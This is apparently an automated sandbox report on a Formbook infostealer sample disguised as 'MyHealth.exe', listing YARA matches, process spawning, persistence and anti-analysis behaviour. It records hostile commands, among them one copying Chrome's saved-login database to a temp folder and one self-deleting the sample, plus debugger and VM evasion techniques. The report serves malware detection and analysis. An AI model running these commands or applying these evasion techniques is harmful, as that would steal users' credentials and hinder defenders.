Source: 00000002.00000002.835867734.000000001F2A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.829435156.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.829435156.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.1101933517.000000001F170000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.1101933517.000000001F170000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.1096990085.000000001F170000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.1096990085.000000001F170000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Classification labelShow sources
Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@21/8@27/10
Creates files inside the user directoryShow sources
Source: C:\Windows\SysWOW64\WWAHost.exeFile created: C:\Users\user\AppData\Roaming\O2116906Jump to behavior
Creates mutexesShow sources
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1164:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4884:120:WilError_01
Creates temporary filesShow sources
Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\G8prdul4Jump to behavior
PE file has an executable .text section and no other executable sectionShow sources
Source: MyHealth.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Parts of this applications are using VB runtime library 6.0 (Probably coded in Visual Basic)Show sources
Source: C:\Users\user\Desktop\MyHealth.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
Reads ini filesShow sources
Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Users\user\Desktop\MyHealth.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Reads the hosts fileShow sources
Source: C:\Users\user\Desktop\MyHealth.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\MyHealth.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\MyHealth.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\MyHealth.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Sample is known by AntivirusShow sources
Source: MyHealth.exeVirustotal: Detection: 68%
Source: MyHealth.exeMetadefender: Detection: 45%
Source: MyHealth.exeReversingLabs: Detection: 64%
Spawns processesShow sources
Source: unknownProcess created: C:\Users\user\Desktop\MyHealth.exe 'C:\Users\user\Desktop\MyHealth.exe'
Source: unknownProcess created: C:\Users\user\Desktop\MyHealth.exe 'C:\Users\user\Desktop\MyHealth.exe'
Source: unknownProcess created: C:\Windows\SysWOW64\WWAHost.exe C:\Windows\SysWOW64\WWAHost.exe
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\MyHealth.exe'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe C:\Program Files (x86)\G8prdul4\jj0t1be8.exe
Source: unknownProcess created: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe 'C:\Program Files (x86)\G8prdul4\jj0t1be8.exe'
Source: unknownProcess created: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe C:\Program Files (x86)\G8prdul4\jj0t1be8.exe
Source: unknownProcess created: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe 'C:\Program Files (x86)\G8prdul4\jj0t1be8.exe'
Source: unknownProcess created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
Source: unknownProcess created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
Source: unknownProcess created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
Source: C:\Users\user\Desktop\MyHealth.exeProcess created: C:\Users\user\Desktop\MyHealth.exe 'C:\Users\user\Desktop\MyHealth.exe' Jump to behavior
Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe C:\Program Files (x86)\G8prdul4\jj0t1be8.exeJump to behavior
Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe 'C:\Program Files (x86)\G8prdul4\jj0t1be8.exe' Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\MyHealth.exe'Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /VJump to behavior
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeProcess created: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe C:\Program Files (x86)\G8prdul4\jj0t1be8.exeJump to behavior
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeProcess created: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe 'C:\Program Files (x86)\G8prdul4\jj0t1be8.exe' Jump to behavior
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
Writes ini filesShow sources
Source: C:\Windows\SysWOW64\WWAHost.exeFile written: C:\Users\user\AppData\Roaming\O2116906\O21logri.iniJump to behavior
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Checks if Microsoft Office is installedShow sources
Source: C:\Windows\SysWOW64\WWAHost.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
Binary contains paths to debug symbolsShow sources
Source: Binary string: chkdsk.pdbGCTL source: jj0t1be8.exe, 00000010.00000002.1086391423.0000000000090000.00000040.00000001.sdmp
Source: Binary string: WWAHost.pdb source: MyHealth.exe
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000000.797648922.0000000007010000.00000002.00000001.sdmp
Source: Binary string: systray.pdb source: jj0t1be8.exe, 00000011.00000002.1090921333.0000000000090000.00000040.00000001.sdmp
Source: Binary string: systray.pdbGCTL source: jj0t1be8.exe, 00000011.00000002.1090921333.0000000000090000.00000040.00000001.sdmp
Source: Binary string: WWAHost.pdbUGP source: MyHealth.exe, 00000002.00000002.829524033.00000000000D0000.00000040.00000001.sdmp
Source: Binary string: chkdsk.pdb source: jj0t1be8.exe, 00000010.00000002.1086391423.0000000000090000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: MyHealth.exe, 00000002.00000002.838348050.000000001F5EF000.00000040.00000001.sdmp, jj0t1be8.exe, 00000010.00000002.1100285506.000000001F4BF000.00000040.00000001.sdmp, jj0t1be8.exe, 00000011.00000002.1102525562.000000001F3A0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: jj0t1be8.exe
Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000000.797648922.0000000007010000.00000002.00000001.sdmp

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 0_2_00401FEB push es; iretd 0_2_00401FF1
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 0_2_004013EC push 00402243h; ret 0_2_004013F6
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 0_2_004057B1 pushfd ; retf 0_2_004057B8
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_3_000F63C9 push ecx; ret 2_3_000F63DC
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_3_000ED81D push ecx; ret 2_3_000ED830
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_3_000A6E44 push eax; retn 0007h2_3_000A6E45
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F41DE2D push ecx; ret 16_2_1F41DE40
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3A92E1 push es; iretd 16_2_1F3A92E8
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3AA830 push es; iretd 16_2_1F3AA831
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F41DE2D push ecx; ret 17_2_1F41DE40
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F3A92E1 push es; iretd 17_2_1F3A92E8
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F3AA830 push es; iretd 17_2_1F3AA831

Boot Survival:

barindex
Creates an autostart registry keyShow sources
Source: C:\Windows\SysWOW64\WWAHost.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run F6H80RMXCNJump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run F6H80RMXCNJump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Users\user\Desktop\MyHealth.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\MyHealth.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\MyHealth.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect virtualization through RDTSC time measurementsShow sources
Source: C:\Windows\SysWOW64\WWAHost.exeRDTSC instruction interceptor: First address: 0000000000C17244 second address: 0000000000C1724A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\WWAHost.exeRDTSC instruction interceptor: First address: 0000000000C174AE second address: 0000000000C174B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 0000000000577244 second address: 000000000057724A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 00000000005774AE second address: 00000000005774B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\systray.exeRDTSC instruction interceptor: First address: 0000000002847244 second address: 000000000284724A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\systray.exeRDTSC instruction interceptor: First address: 00000000028474AE second address: 00000000028474B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggersShow sources
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F495595 rdtsc 16_2_1F495595
Found large amount of non-executed APIsShow sources
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeAPI coverage: 4.6 %
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeAPI coverage: 4.6 %
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Users\user\Desktop\MyHealth.exe TID: 3812Thread sleep count: 178 > 30Jump to behavior
Source: C:\Windows\explorer.exe TID: 2368Thread sleep time: -54000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe TID: 1044Thread sleep count: 64 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe TID: 1044Thread sleep time: -320000s >= -30000sJump to behavior
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe TID: 5032Thread sleep count: 108 > 30Jump to behavior
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe TID: 1344Thread sleep count: 90 > 30Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)Show sources
Source: C:\Windows\explorer.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)Show sources
Source: explorer.exe, 00000003.00000000.798112025.0000000007340000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: jj0t1be8.exe, 00000010.00000003.1070439608.0000000000960000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
Source: explorer.exe, 00000003.00000000.798112025.0000000007340000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: jj0t1be8.exe, 00000010.00000003.1070439608.0000000000960000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW,
Source: explorer.exe, 00000003.00000000.798112025.0000000007340000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: jj0t1be8.exe, 00000010.00000002.1088017475.0000000000920000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW@
Source: explorer.exe, 00000003.00000000.798112025.0000000007340000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Queries a list of all running processesShow sources
Source: C:\Users\user\Desktop\MyHealth.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging:

barindex
Contains functionality to hide a thread from the debuggerShow sources
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 15_2_02A50084 NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,0000000015_2_02A50084
Hides threads from debuggersShow sources
Source: C:\Users\user\Desktop\MyHealth.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\Desktop\MyHealth.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\Desktop\MyHealth.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeThread information set: HideFromDebuggerJump to behavior
Checks if the current process is being debuggedShow sources
Source: C:\Users\user\Desktop\MyHealth.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exeProcess queried: DebugPortJump to behavior
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeProcess queried: DebugPortJump to behavior
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeProcess queried: DebugPortJump to behavior
Contains functionality for execution timing, often used to detect debuggersShow sources
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F495595 rdtsc 16_2_1F495595
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)Show sources
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_3_000F202D LdrInitializeThunk,2_3_000F202D
Contains functionality to read the PEBShow sources
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_3_001206CE mov eax, dword ptr fs:[00000030h]2_3_001206CE
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_3_001206CE mov eax, dword ptr fs:[00000030h]2_3_001206CE
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_3_000D47D7 mov eax, dword ptr fs:[00000030h]2_3_000D47D7
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_3_0011FC80 mov eax, dword ptr fs:[00000030h]2_3_0011FC80
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_2_1F50DF40 mov eax, dword ptr fs:[00000030h]2_2_1F50DF40
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_2_1F572F40 mov eax, dword ptr fs:[00000030h]2_2_1F572F40
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_2_1F539F7A mov eax, dword ptr fs:[00000030h]2_2_1F539F7A
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_2_1F50EF60 mov eax, dword ptr fs:[00000030h]2_2_1F50EF60
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_2_1F521F10 mov eax, dword ptr fs:[00000030h]2_2_1F521F10
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_2_1F521F10 mov eax, dword ptr fs:[00000030h]2_2_1F521F10
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_2_1F5B2F18 mov eax, dword ptr fs:[00000030h]2_2_1F5B2F18
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_2_1F5B2F18 mov eax, dword ptr fs:[00000030h]2_2_1F5B2F18
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_2_1F5B2F18 mov eax, dword ptr fs:[00000030h]2_2_1F5B2F18
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_2_1F506F05 mov eax, dword ptr fs:[00000030h]2_2_1F506F05
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_2_1F506F05 mov eax, dword ptr fs:[00000030h]2_2_1F506F05
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_2_1F506F05 mov eax, dword ptr fs:[00000030h]2_2_1F506F05
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_2_1F506F05 mov eax, dword ptr fs:[00000030h]2_2_1F506F05
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_2_1F506F05 mov eax, dword ptr fs:[00000030h]2_2_1F506F05
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_2_1F5BDF39 mov eax, dword ptr fs:[00000030h]2_2_1F5BDF39
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_2_1F4F2FD0 mov eax, dword ptr fs:[00000030h]2_2_1F4F2FD0
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_2_1F4F2FD0 mov eax, dword ptr fs:[00000030h]2_2_1F4F2FD0
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_2_1F4F2FD0 mov eax, dword ptr fs:[00000030h]2_2_1F4F2FD0
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_2_1F4F2FD0 mov ecx, dword ptr fs:[00000030h]2_2_1F4F2FD0
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_2_1F4F2FD0 mov eax, dword ptr fs:[00000030h]2_2_1F4F2FD0
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_2_1F4F2FD0 mov eax, dword ptr fs:[00000030h]2_2_1F4F2FD0
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_2_1F4F2FD0 mov eax, dword ptr fs:[00000030h]2_2_1F4F2FD0
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_2_1F4F2FD0 mov eax, dword ptr fs:[00000030h]2_2_1F4F2FD0
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_2_1F4F2FD0 mov eax, dword ptr fs:[00000030h]2_2_1F4F2FD0
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_2_1F4F2FD0 mov eax, dword ptr fs:[00000030h]2_2_1F4F2FD0
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_2_1F4F2FD0 mov eax, dword ptr fs:[00000030h]2_2_1F4F2FD0
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_2_1F4F3FE5 mov eax, dword ptr fs:[00000030h]2_2_1F4F3FE5
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_2_1F4F3FE5 mov eax, dword ptr fs:[00000030h]2_2_1F4F3FE5
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_2_1F4F3FE5 mov eax, dword ptr fs:[00000030h]2_2_1F4F3FE5
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_2_1F5BAF81 mov eax, dword ptr fs:[00000030h]2_2_1F5BAF81
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_2_1F5BAF81 mov eax, dword ptr fs:[00000030h]2_2_1F5BAF81
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_2_1F5BAF81 mov eax, dword ptr fs:[00000030h]2_2_1F5BAF81
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_2_1F5BAF81 mov eax, dword ptr fs:[00000030h]2_2_1F5BAF81
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_2_1F5BFFAC mov eax, dword ptr fs:[00000030h]2_2_1F5BFFAC
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_2_1F5BFFAC mov eax, dword ptr fs:[00000030h]2_2_1F5BFFAC
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_2_1F52DE50 mov eax, dword ptr fs:[00000030h]2_2_1F52DE50
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_2_1F4FCE50 mov eax, dword ptr fs:[00000030h]2_2_1F4FCE50
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_2_1F525E70 mov eax, dword ptr fs:[00000030h]2_2_1F525E70
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_2_1F525E70 mov eax, dword ptr fs:[00000030h]2_2_1F525E70
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_2_1F525E70 mov eax, dword ptr fs:[00000030h]2_2_1F525E70
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_2_1F525E70 mov eax, dword ptr fs:[00000030h]2_2_1F525E70
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 15_2_02A523AB mov eax, dword ptr fs:[00000030h]15_2_02A523AB
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 15_2_02A506B1 mov eax, dword ptr fs:[00000030h]15_2_02A506B1
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 15_2_02A52189 mov eax, dword ptr fs:[00000030h]15_2_02A52189
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 15_2_02A511F0 mov eax, dword ptr fs:[00000030h]15_2_02A511F0
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 15_2_02A50B26 mov eax, dword ptr fs:[00000030h]15_2_02A50B26
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 15_2_02A5214E mov eax, dword ptr fs:[00000030h]15_2_02A5214E
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F442F40 mov eax, dword ptr fs:[00000030h]16_2_1F442F40
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F473740 mov eax, dword ptr fs:[00000030h]16_2_1F473740
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3F1F10 mov eax, dword ptr fs:[00000030h]16_2_1F3F1F10
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3F1F10 mov eax, dword ptr fs:[00000030h]16_2_1F3F1F10
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3D6F05 mov eax, dword ptr fs:[00000030h]16_2_1F3D6F05
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3D6F05 mov eax, dword ptr fs:[00000030h]16_2_1F3D6F05
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3D6F05 mov eax, dword ptr fs:[00000030h]16_2_1F3D6F05
